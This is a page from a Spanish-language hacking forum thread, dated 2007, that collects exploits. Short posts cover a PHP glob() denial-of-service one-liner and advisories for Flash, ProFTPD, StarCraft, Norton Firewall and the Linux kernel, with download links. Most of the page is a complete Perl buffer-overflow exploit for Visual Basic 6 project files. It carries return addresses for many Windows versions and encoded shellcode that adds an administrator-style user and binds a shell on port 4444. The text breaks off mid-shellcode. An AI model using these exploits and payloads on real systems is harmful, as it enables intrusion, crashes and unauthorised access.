elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.


 


Tema destacado: Recuerda que debes registrarte en el foro para poder participar (preguntar y responder)


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits (Moderador: berz3k)
| | |-+  Recopilatorio de Exploits Interesantes (-Actualizando-)
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: 1 2 3 4 5 6 [7] 8 Ir Abajo Respuesta Imprimir
Autor Tema: Recopilatorio de Exploits Interesantes (-Actualizando-)  (Leído 99,189 veces)
yeikos


Desconectado Desconectado

Mensajes: 1.424



Ver Perfil
PHP5 glob() Remote DoS Exploit - 0day
« Respuesta #60 en: 16 Julio 2007, 22:23 »

Citar
<?php
glob(1,-1);
?>

Fuente: http://www.0x000000.com/?i=388
En línea

sirdarckcat
Aspirante a supervillano
Moderador Global
***
Desconectado Desconectado

Mensajes: 7.012


No estoy loco, soy mentalmente divergente


Ver Perfil WWW
Re: <-> Recopilatorio de Exploits Interesantes (-Actualizando-)
« Respuesta #61 en: 28 Julio 2007, 05:07 »

El de flash :P que "FUE" grande..

El video:


El exploit:
http://www.securityfocus.com/data/vulnerabilities/exploits/24856.zip

Saludos!!
En línea

yeikos


Desconectado Desconectado

Mensajes: 1.424



Ver Perfil
Action Script 3 Socket Flaw Design
« Respuesta #62 en: 12 Agosto 2007, 13:25 »

Citar

   Action Script 3 Socket Flaw Design
   
     [Descripción]
        Debido a un fallo en el diseño del manejo de sockets en Action Script 3,
        es posible saltarse el modelo de seguridad sandbox de Flash, pudiendo
        de este modo explorar localmente los puertos TCP del ordenador donde
        se está ejecutando el flash.

       
     [Plataformas funcionales]
        - Windows XP SP2: Internet Explorer 6 / Flash Player 9.0.47.0
        - Windows XP SP2: Firefox 2.0.0.5 / Flash Player 9.0.47.0
        - Windows XP SP2: IE 7.0.5730.11 Flash Player 9.0.47.0
        - Ubuntu Edgy: Firefox 2.0.0.5 / Flash Player 9.0.47.0
        - Mac OSX 10.4.10: Safari 2.0.4 / Flash Player 9.0.47.0
        - Mac OSX 10.4.10: Safari 3.0.2 / Flash Player 9.0.47.0
        - Mac OSX 10.4.10: Firefox 2.0.0.6 / Flash Player 9.0.47.0
        - Solaris 10 i86: Firefox 2.0.0.3 / Flash Player 9.0.47.0
      
     [Plataformas no funcionales]
        - Mac OSX 10.4.10: Opera 9.22 / Flash Player 9.0.47.0
   
     [Enlaces]
        - Prueba del concepto: http://scan.flashsec.org
        - Código fuente: http://scan.flashsec.org/classes/Main.as


     Fuente original: http://scan.flashsec.org

En línea

WHK
吴阿卡
Moderador Global
***
Desconectado Desconectado

Mensajes: 5.833


The Hacktivism is not a crime


Ver Perfil WWW
Debilidad del registro en los formatos binarios del Kernel de Linux
« Respuesta #63 en: 21 Agosto 2007, 05:56 »

Un documento creado por el equipo de GoodFellas  demuestra la debilidad de diseño encontrado en el manejo de listas simplemente enlazadas usada para la registración de formatos de binario manejado por el kernel, el mismo afecta a toda la familia de kernel GNU/Linux (2.0/2.2/2.4/2.6), permitiendo la inserción de módulos de infección en kernel-space que pueden ser utilizados con fines personales para la creación de distintas herramientas de infección, por ejemplo rootkits.

Si bién, la utilización de la técnica presentada en el presente documento podría ser utilizada con fines de protección, prevención, control en la ejecución de binarios, y auditorías; la contramedida podría verse afectada directamente por la misma técnica.

Cabe destacar que la técnica utilizada para manejar la lista simplemente enlazada la consideramos correcta, no así el contexto de las estructuras de datos involucradas.

Ver documento en PDF (Español)
Ver documento en PDF (Ingles)
Presentación creada en H2HC (Ingles)
PoC

Fuentes:
http://whk.sitehacking.net/?p=31
http://goodfellas.shellcode.com.ar/

El PDF está bastante bueno, lleva tiempo pero aún vigente.
« Última modificación: 21 Agosto 2007, 05:58 por WHK » En línea

yeikos


Desconectado Desconectado

Mensajes: 1.424



Ver Perfil
ProFTPD MOD TLS Remote Buffer Overflow [Exploit] - 0day
« Respuesta #64 en: 25 Agosto 2007, 03:24 »

Citar

   ProFTPD MOD_TLS Remote Buffer Overflow [Exploit]
   
     [Descripción]

        Debido a una limitación de seguridad no aplicada en una de las variables del módulo TLS (mod_tls.c),
        es posible la ejecución código arbitrario remotamente en el servidor, comprometiendo tanto la integridad,
        como la seguridad de éste.
       
     [Versiones vulnerables]
        - ProFTPD versión =< 1.3.0
      
     [Enlaces]

        - Página Web del fabricante: http://www.proftpd.org
        - Exploit: http://www.milw0rm.com/exploits/4312
        - Detalles técnicos: http://www.securityfocus.com/archive/1/452872
        - Módulo TLS: http://www.castaglia.org/proftpd/modules/mod_tls.html

« Última modificación: 31 Agosto 2007, 01:11 por yeikos » En línea

yeikos


Desconectado Desconectado

Mensajes: 1.424



Ver Perfil
Blizzard StarCraft: Denegación del servicio local y remota
« Respuesta #65 en: 30 Agosto 2007, 02:01 »

Citar

   Blizzard StarCraft: Denegación del servicio local y remota - 0day
   
     [Descripción]

        StarCraft es un juego de estrategia futurista en tiempo real de la compañía Blizzard Entertainment.

        Cuando un jugador accede accede a una partida, local o remota en modo multijugador, se genera una
        vista previa del mapa en cuestión. Generando una imagen malformada de esta vista previa,
        es posible causar una violación de lectura conllevando a una denegación del servicio.
    
     [Versiones vulnerables]
        - StarCraft Brood War <= 1.15.1
        - StarCraft <= 1.15.1
      
     [Enlaces]
        - Advisory: http://securityvulns.com/Rdocument915.html
        - Prueba del concepto: http://blog.hispasec.com/lab/files/SC_PoC_DoS.scm
        - Exploit (código fuente): http://blog.hispasec.com/lab/files/SC_Patch.c
        - Exploit (binario): http://blog.hispasec.com/lab/files/SC_Patch.exe

« Última modificación: 31 Agosto 2007, 01:11 por yeikos » En línea

yeikos


Desconectado Desconectado

Mensajes: 1.424



Ver Perfil
Symantec Norton Personal Firewall 2006: Denegación del servicio [Exploit] - 0day
« Respuesta #66 en: 31 Agosto 2007, 01:05 »

Citar

   Symantec Norton Personal Firewall 2006: Denegación del servicio [Exploit] - 0day
   
     [Descripción]

        Symantec Corporation posee una gran gama de productos orientados a la seguridad del usuario,
        entre los que se encuentra el cortafuegos Norton Personal Firewall, vulnerable a una
        denegación del servicio que pone en peligro la seguridad del usuario.

        SSDT (Hooking System Service Descriptor Table) es el método más común y puesto en práctica,
        por los cortafuegos, para comprobar los privilegios del proceso antes de que éste sea ejecutado.
        Estas funciones reemplazan algunos servicios internos del sistema y son ejecutadas en el interior
        del núcleo, pero sus llamadas son ejecutadas en modo usuario, de ahí el sumo cuidado con el que hay
        que tratarlas.

        Symantec Norton Personal Firewall utiliza varias funciones de este tipo, entre las que se encuentran
        dos funciones que no validan los argumentos; NtCreateMutant y NtOpenEvent. Estas dos funciones pueden causar
        errores en el controlador SPBBCDrv.sys de Norton al pasarle argumentos no válidos.

        Al explotar esta vulnerabilidad se ocasionará una denegación del servicio, saltándose todos las protecciones
        y finalizando el proceso del cortafuegos, comprometiendo la seguridad del usuario en la red.
        La ejecución de código arbitrario aún no ha sido experimentada en esta vulnerabilidad.
       
     [Versiones vulnerables]
        - Symantec Norton Personal Firewall 2006 9.1.1 .7
        - Symantec Norton Personal Firewall 2006 9.1 .33
      
     [Enlaces]

        - Advisory: http://www.matousec.com/info/advisories/Norton-Multiple-insufficient-argument...
        - Exploit: http://downloads.securityfocus.com/vulnerabilities/exploits/Symantec_Firewall_SPBBCDrv_DoS.c
      
En línea

Spider-Net


Desconectado Desconectado

Mensajes: 1.165


Un gran poder conlleva una gran responsabilidad


Ver Perfil WWW
Exploit Visual Basic 6 Project
« Respuesta #67 en: 6 Septiembre 2007, 13:41 »

Nuevo exploit en perl para visual basic 6. Crea directamente una shell, es un exploit local para los archivos .VBP (Visual Basic Project).

Código
  1. #!/usr/bin/perl
  2. #' ++ Microsoft Visual Basic 6.0 Code Execution 0-Day ++
  3. #' ++++++++++++++++++++++++++++++++++++++++++++++++++++++
  4. #'++ Author: Koshi                                      +
  5. #'++ Email: heykoshi at gmail dot com                   +
  6. #'++ Application: Microsoft Visual Basic 6.0            +
  7. #'++                                                    +
  8. #'++ Tested on Microsoft Windows XP Home Edition SP2    +
  9. #'++ Patched & Updated                                  +
  10. #'++                                                    +
  11. #'++ The vulnerable buffer exsists in the .VBP files of +
  12. #'++ Visual Basic projects. You can jump directly to    +
  13. #'++ the shellcode, or jump to it via EBP.              +
  14. #'++                                                    +
  15. #'++ There is NO restriction of shellcode size either.  +
  16. #'++                                                    +
  17. #'++ Gr33tz: Rima my baby who I love and adore, Draven  +
  18. #'++ for pointing me in the right direction, as always. +
  19. #'++                                                    +
  20. #'++                                                    +
  21. #'++ This exploit is for educational use only, blah.    +
  22. #'++                                                    +
  23. #'++                                                    +
  24. #'+++++++++++++++++++++++++++++++++++++++++++++++++++++++
  25. #'+++++++++++++++++++++++++++++++++++++++++++++++++++++
  26. #
  27. # Ex. of Usage:
  28. # perl vb6.pl 1 >>Project.vbp
  29. #
  30. #
  31. $begin0 = "\x54\x79\x70\x65\x3D\x45\x78\x65\x0D\x0A\x46\x6F\x72\x6D".
  32.  "\x3D\x46\x6F\x72\x6D\x31\x2E\x66\x72\x6D\x0D\x0A";
  33.  
  34. $begin1 = "\x52\x65\x66\x65\x72\x65\x6E\x63\x65\x3D".
  35.  "\x2A\x5C\x47\x7B\x30\x30\x30\x32\x30\x34\x33\x30\x2D\x30".
  36.          "\x30\x30\x30\x2D\x30\x30\x30\x30\x2D\x43\x30\x30\x30\x2D".
  37.          "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x34\x36\x7D\x23".
  38.          "\x32\x2E\x30\x23\x30\x23\x2E\x2E\x5C\x2E\x2E\x5C\x2E\x2E".
  39.          "\x5C\x2E\x2E\x5C\x2E\x2E\x5C\x57\x49\x4E\x44\x4F\x57\x53".
  40.          "\x5C\x73\x79\x73\x74\x65\x6D\x33\x32\x5C\x73\x74\x64\x6F".
  41.          "\x6C\x65\x32\x2E\x74\x6C\x62\x23\x4F\x4C\x45\x20\x41\x75".
  42.          "\x74\x6F\x6D\x61\x74\x69\x6F\x6E";
  43.  
  44. $begin2 = "\x0D\x0A\x53\x74\x61\x72\x74\x75\x70\x3D\x22\x46\x6F\x72\x6D\x31\x22\x0D\x0A".
  45.          "\x43\x6F\x6D\x6D\x61\x6E\x64\x33\x32\x3D\x22\x22";
  46.  
  47. $BuffOf = "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
  48.  "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
  49.  "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
  50.  "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
  51.  "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
  52.  "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
  53.  "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
  54.  "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
  55.  "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
  56.  "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
  57.  "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
  58.  "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
  59.  "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
  60.  "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
  61.  "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
  62.  "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
  63.  "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
  64.  "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
  65.  "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
  66.  "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
  67.  "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
  68.  "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
  69.  "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
  70.  "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
  71.  "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
  72.  "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
  73.  "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
  74.  "\x41\x41\x41\x41";
  75.  
  76. $codeAddr = "\x83\x25\x40\x01";
  77. # You can most likely use a call or a push, you could probably use them from kernel32.dll too.
  78. #* ntdll.dll    - 0x7C923DA3      jmp Ebp **** Is the one i have used in this example.
  79. # 0x77f6d42f   jmp ebp   ntdll.dll  (English / 5.2.3790.3) Windows 2003 Server 5.2.0.0 SP0 (IA32)
  80. # 0x77f7d9b6 jmp ebp ntdll.dll  (English / 5.1.2600.11061) Windows XP 5.1.1.0 SP1 (IA32)
  81. # 0x77f8c449 jmp ebp ntdll.dll  (English / 5.0.2163.1) Windows 2000 5.0.0.0 SP0 (IA32)
  82. # 0x77faa6ce jmp ebp ntdll.dll  (English / 5.2.3790.3) Windows 2003 Server 5.2.0.0 SP0 (IA32)
  83. # 0x7c85eb73 jmp ebp ntdll.dll  (English / 5.2.3790.1830031) Windows 2003 Server 5.2.1.0 SP1 (IA32)
  84. # 0x7c8839ed jmp ebp ntdll.dll  (English / 5.2.3790.1830031) Windows 2003 Server 5.2.1.0 SP1 (IA32)
  85. #*0x7c923da3 jmp ebp ntdll.dll  (English / 5.1.2600.21802) Windows XP 5.1.2.0 SP2 (IA32)
  86. # 0x77f8c449 jmp ebp   ntdll.dll  (French / 5.0.2163.1) Windows 2000 5.0.0.0 SP0 (IA32)
  87. # 0x77f6d9b6   jmp ebp   ntdll.dll  (German / 5.1.2600.11061) Windows XP 5.1.1.0 SP1 (IA32)
  88. # 0x7c933da3 jmp ebp   ntdll.dll  (German / 5.1.2600.21802) Windows XP 5.1.2.0 SP2 (IA32)
  89. # 0x77f5d42f   jmp ebp   ntdll.dll  (Italian / 5.2.3790.3) No associated versions
  90. # 0x77f6d9b6 jmp ebp ntdll.dll  (Italian / 5.1.2600.11061) Windows XP 5.1.1.0 SP1 (IA32)
  91. # 0x77f8c449 jmp ebp ntdll.dll  (Italian / 5.0.2163.1) Windows 2000 5.0.0.0 SP0 (IA32)
  92. # 0x77f9a6ce jmp ebp ntdll.dll  (Italian / 5.2.3790.3) No associated versions
  93. # 0x7c96eb73 jmp ebp ntdll.dll  (Italian / 5.2.3790.1830031) No associated versions
  94. # 0x7c9939ed jmp ebp ntdll.dll  (Italian / 5.2.3790.1830031) No associated versions
  95. # ...backwards..if you don't know why, then gtfo.
  96. $jmpEbp = "\xA3\x3D\x92\x7C";
  97. $fourSkin = "\x44\x44\x44\x44";
  98.  
  99.  
  100. $begin3 = "\x0D\x0A\x4E\x61\x6D\x65\x3D\x22\x50\x72\x6F\x6A\x65\x63".
  101.  "\x74\x31\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
  102.          "\x41\x41\x41\x41\x41\x41\x41\x41";
  103.  
  104. $koshi = "\x0D\x0A\x48\x65\x6C\x70\x43\x6F\x6E\x74\x65\x78\x74\x49\x44\x3D\x22\x30\x22\x0D\x0A\x43\x6F\x6D".
  105. "\x70\x61\x74\x69\x62\x6C\x65\x4D\x6F\x64\x65\x3D\x22\x30\x22\x0D\x0A\x4D\x61\x6A\x6F\x72\x56\x65".
  106. "\x72\x3D\x31\x0D\x0A\x4D\x69\x6E\x6F\x72\x56\x65\x72\x3D\x30\x0D\x0A\x52\x65\x76\x69\x73\x69\x6F".
  107. "\x6E\x56\x65\x72\x3D\x30\x0D\x0A\x41\x75\x74\x6F\x49\x6E\x63\x72\x65\x6D\x65\x6E\x74\x56\x65\x72".
  108. "\x3D\x30\x0D\x0A\x53\x65\x72\x76\x65\x72\x53\x75\x70\x70\x6F\x72\x74\x46\x69\x6C\x65\x73\x3D\x30".
  109. "\x0D\x0A\x43\x6F\x6D\x70\x69\x6C\x61\x74\x69\x6F\x6E\x54\x79\x70\x65\x3D\x30\x0D\x0A\x4F\x70\x74".
  110. "\x69\x6D\x69\x7A\x61\x74\x69\x6F\x6E\x54\x79\x70\x65\x3D\x30\x0D\x0A\x46\x61\x76\x6F\x72\x50\x65".
  111. "\x6E\x74\x69\x75\x6D\x50\x72\x6F\x28\x74\x6D\x29\x3D\x30\x0D\x0A\x43\x6F\x64\x65\x56\x69\x65\x77".
  112. "\x44\x65\x62\x75\x67\x49\x6E\x66\x6F\x3D\x30\x0D\x0A\x4E\x6F\x41\x6C\x69\x61\x73\x69\x6E\x67\x3D".
  113. "\x30\x0D\x0A\x42\x6F\x75\x6E\x64\x73\x43\x68\x65\x63\x6B\x3D\x30\x0D\x0A\x4F\x76\x65\x72\x66\x6C".
  114. "\x6F\x77\x43\x68\x65\x63\x6B\x3D\x30\x0D\x0A\x46\x6C\x50\x6F\x69\x6E\x74\x43\x68\x65\x63\x6B\x3D".
  115. "\x30\x0D\x0A\x46\x44\x49\x56\x43\x68\x65\x63\x6B\x3D\x30\x0D\x0A\x55\x6E\x72\x6F\x75\x6E\x64\x65".
  116. "\x64\x46\x50\x3D\x30\x0D\x0A\x53\x74\x61\x72\x74\x4D\x6F\x64\x65\x3D\x30\x0D\x0A\x55\x6E\x61\x74".
  117. "\x74\x65\x6E\x64\x65\x64\x3D\x30\x0D\x0A\x52\x65\x74\x61\x69\x6E\x65\x64\x3D\x30\x0D\x0A\x54\x68".
  118. "\x72\x65\x61\x64\x50\x65\x72\x4F\x62\x6A\x65\x63\x74\x3D\x30\x0D\x0A\x4D\x61\x78\x4E\x75\x6D\x62".
  119. "\x65\x72\x4F\x66\x54\x68\x72\x65\x61\x64\x73\x3D\x31\x0D\x0A\x0D\x0A\x5B\x4D\x53\x20\x54\x72\x61".
  120. "\x6E\x73\x61\x63\x74\x69\x6F\x6E\x20\x53\x65\x72\x76\x65\x72\x5D\x0D\x0A\x41\x75\x74\x6F\x52\x65".
  121. "\x66\x72\x65\x73\x68\x3D\x31\x0D\x0A";
  122.  
  123. # win32_exec -  EXITFUNC=seh CMD=calc.exe Size=351 Encoder=PexAlphaNum http://metasploit.com
  124. $shellc1 = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
  125.     "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
  126.   "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
  127.   "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
  128.   "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34".
  129.   "\x42\x50\x42\x30\x42\x50\x4b\x38\x45\x44\x4e\x43\x4b\x38\x4e\x47".
  130.   "\x45\x30\x4a\x47\x41\x30\x4f\x4e\x4b\x48\x4f\x54\x4a\x41\x4b\x38".
  131.   "\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x48\x46\x33\x4b\x48".
  132.   "\x41\x50\x50\x4e\x41\x43\x42\x4c\x49\x59\x4e\x4a\x46\x48\x42\x4c".
  133.   "\x46\x47\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e".
  134.   "\x46\x4f\x4b\x43\x46\x35\x46\x52\x46\x30\x45\x37\x45\x4e\x4b\x58".
  135.   "\x4f\x45\x46\x42\x41\x50\x4b\x4e\x48\x46\x4b\x48\x4e\x30\x4b\x44".
  136.   "\x4b\x48\x4f\x35\x4e\x41\x41\x30\x4b\x4e\x4b\x38\x4e\x51\x4b\x38".
  137.   "\x41\x50\x4b\x4e\x49\x38\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33".
  138.   "\x42\x4c\x46\x46\x4b\x48\x42\x34\x42\x33\x45\x38\x42\x4c\x4a\x47".
  139.     "\x4e\x30\x4b\x38\x42\x34\x4e\x50\x4b\x58\x42\x47\x4e\x41\x4d\x4a".
  140.   "\x4b\x58\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x48\x42\x48\x42\x4b".
  141.   "\x42\x30\x42\x50\x42\x30\x4b\x38\x4a\x56\x4e\x43\x4f\x55\x41\x33".
  142.   "\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x37".
  143.   "\x42\x55\x4a\x36\x42\x4f\x4c\x58\x46\x50\x4f\x35\x4a\x36\x4a\x59".
  144.   "\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x56\x41\x56".
  145.   "\x4e\x46\x43\x56\x50\x32\x45\x46\x4a\x37\x45\x36\x42\x50\x5a";
  146.  
  147. # win32_adduser -  PASS=koshi EXITFUNC=seh USER=4dmin Size=495 Encoder=PexAlphaNum http://metasploit.com
  148. $shellc2 = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
  149.   "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
  150.   "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
  151.   "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
  152.   "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44".
  153.   "\x42\x30\x42\x50\x42\x30\x4b\x48\x45\x44\x4e\x53\x4b\x38\x4e\x37".
  154.   "\x45\x50\x4a\x47\x41\x50\x4f\x4e\x4b\x38\x4f\x54\x4a\x51\x4b\x58".
  155.   "\x4f\x35\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x38\x46\x53\x4b\x48".
  156.   "\x41\x30\x50\x4e\x41\x53\x42\x4c\x49\x39\x4e\x4a\x46\x48\x42\x4c".
  157.   "\x46\x57\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e".
  158.   "\x46\x4f\x4b\x53\x46\x55\x46\x52\x46\x30\x45\x47\x45\x4e\x4b\x48".
  159.   "\x4f\x45\x46\x42\x41\x50\x4b\x4e\x48\x46\x4b\x48\x4e\x50\x4b\x54".
  160.   "\x4b\x48\x4f\x55\x4e\x51\x41\x50\x4b\x4e\x4b\x58\x4e\x51\x4b\x58".
  161.   "\x41\x30\x4b\x4e\x49\x38\x4e\x55\x46\x42\x46\x30\x43\x4c\x41\x33".
  162.   "\x42\x4c\x46\x46\x4b\x58\x42\x34\x42\x53\x45\x48\x42\x4c\x4a\x37".
  163.   "\x4e\x30\x4b\x48\x42\x44\x4e\x30\x4b\x48\x42\x37\x4e\x51\x4d\x4a".
  164.   "\x4b\x58\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x48\x42\x48\x42\x4b".
  165.   "\x42\x30\x42\x30\x42\x50\x4b\x58\x4a\x36\x4e\x53\x4f\x45\x41\x53".
  166.   "\x48\x4f\x42\x36\x48\x45\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x57".
  167.   "\x42\x55\x4a\x56\x42\x4f\x4c\x58\x46\x50\x4f\x55\x4a\x46\x4a\x59".
  168.   "\x50\x4f\x4c\x58\x50\x30\x47\x35\x4f\x4f\x47\x4e\x43\x36\x4d\x46".
  169.   "\x46\x56\x50\x42\x45\x36\x4a\x37\x45\x56\x42\x32\x4f\x52\x43\x46".
  170.   "\x42\x42\x50\x56\x45\x46\x46\x47\x42\x52\x45\x47\x43\x37\x45\x36".
  171.   "\x44\x57\x42\x42\x46\x53\x46\x36\x4d\x56\x49\x46\x50\x56\x42\x32".
  172.   "\x4b\x36\x4f\x36\x43\x37\x4a\x46\x49\x36\x42\x32\x4f\x42\x41\x34".
  173.   "\x46\x54\x46\x34\x42\x32\x48\x52\x48\x52\x42\x52\x50\x36\x45\x46".
  174.   "\x46\x57\x42\x42\x4e\x56\x4f\x36\x43\x36\x41\x36\x4e\x46\x47\x56".
  175.   "\x44\x37\x4f\x36\x45\x57\x42\x57\x42\x52\x41\x44\x46\x56\x4d\x56".
  176.   "\x49\x46\x50\x56\x49\x46\x43\x47\x46\x57\x44\x37\x41\x36\x46\x57".
  177.   "\x4f\x46\x44\x37\x43\x37\x42\x32\x46\x43\x46\x36\x4d\x56\x49\x36".
  178.   "\x50\x56\x42\x42\x4f\x32\x41\x44\x46\x54\x46\x54\x42\x50\x5a";
  179.  
  180. # win32_bind -  EXITFUNC=seh LPORT=4444 Size=709 Encoder=PexAlphaNum http://metasploit.com
  181. $shellc3 = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
  182.   "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
  183.   "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
  184.   "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
  185.   "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e".
  186.   "\x4d\x44\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x56\x4b\x38".
  187.   "\x4e\x36\x46\x52\x46\x32\x4b\x38\x45\x54\x4e\x53\x4b\x48\x4e\x37".
  188.   "\x45\x30\x4a\x47\x41\x30\x4f\x4e\x4b\x58\x4f\x44\x4a\x41\x4b\x58".
  189.   "\x4f\x45\x42\x52\x41\x50\x4b\x4e\x49\x44\x4b\x58\x46\x33\x4b\x48".
  190.   "\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x39\x4e\x4a\x46\x58\x42\x4c".
  191.   "\x46\x37\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x50\x44\x4c\x4b\x4e".
  192.   "\x46\x4f\x4b\x33\x46\x35\x46\x32\x4a\x32\x45\x57\x45\x4e\x4b\x48".
  193.   "\x4f\x35\x46\x32\x41\x30\x4b\x4e\x48\x36\x4b\x58\x4e\x30\x4b\x54".
  194.   "\x4b\x58\x4f\x35\x4e\x31\x41\x50\x4b\x4e\x43\x50\x4e\x52\x4b\x58".
  195.   "\x49\x58\x4e\x46\x46\x52\x4e\x31\x41\x46\x43\x4c\x41\x33\x4b\x4d".
  196.   "\x46\x46\x4b\x48\x43\x34\x42\x53\x4b\x58\x42\x54\x4e\x30\x4b\x48".
  197.   "\x42\x57\x4e\x31\x4d\x4a\x4b\x48\x42\x44\x4a\x50\x50\x45\x4a\x46".
  198.   "\x50\x38\x50\x34\x50\x50\x4e\x4e\x42\x55\x4f\x4f\x48\x4d\x48\x46".
  199.   "\x43\x45\x48\x56\x4a\x36\x43\x53\x44\x33\x4a\x46\x47\x57\x43\x37".
  200.   "\x44\x53\x4f\x55\x46\x35\x4f\x4f\x42\x4d\x4a\x56\x4b\x4c\x4d\x4e".
  201.   "\x4e\x4f\x4b\x53\x42\x55\x4f\x4f\x48\x4d\x4f\x45\x49\x38\x45\x4e".
  202.   "\x48\x36\x41\x58\x4d\x4e\x4a\x50\x44\x30\x45\x45\x4c\x36\x44\x50".
  203.   "\x4f\x4f\x42\x4d\x4a\x56\x49\x4d\x49\x30\x45\x4f\x4d\x4a\x47\x45".
  204.   "\x4f\x4f\x48\x4d\x43\x45\x43\x45\x43\x55\x43\x55\x43\x55\x43\x54".
  205.   "\x43\x45\x43\x54\x43\x45\x4f\x4f\x42\x4d\x48\x46\x4a\x36\x41\x31".
  206.   "\x4e\x35\x48\x46\x43\x55\x49\x58\x41\x4e\x45\x59\x4a\x46\x46\x4a".
  207.   "\x4c\x41\x42\x47\x47\x4c\x47\x35\x4f\x4f\x48\x4d\x4c\x46\x42\x31".
  208.   "\x41\x55\x45\x55\x4f\x4f\x42\x4d\x4a\x46\x46\x4a\x4d\x4a\x50\x32".
  209.   "\x49\x4e\x47\x55\x4f\x4f\x48\x4d\x43\x55\x45\x55\x4f\x4f\x42\x4d".
  210.   "\x4a\x56\x45\x4e\x49\x44\x48\x38\x49\x34\x47\x55\x4f\x4f\x48\x4d".
  211.   "\x42\x45\x46\x45\x46\x45\x45\x35\x4f\x4f\x42\x4d\x43\x59\x4a\x36".
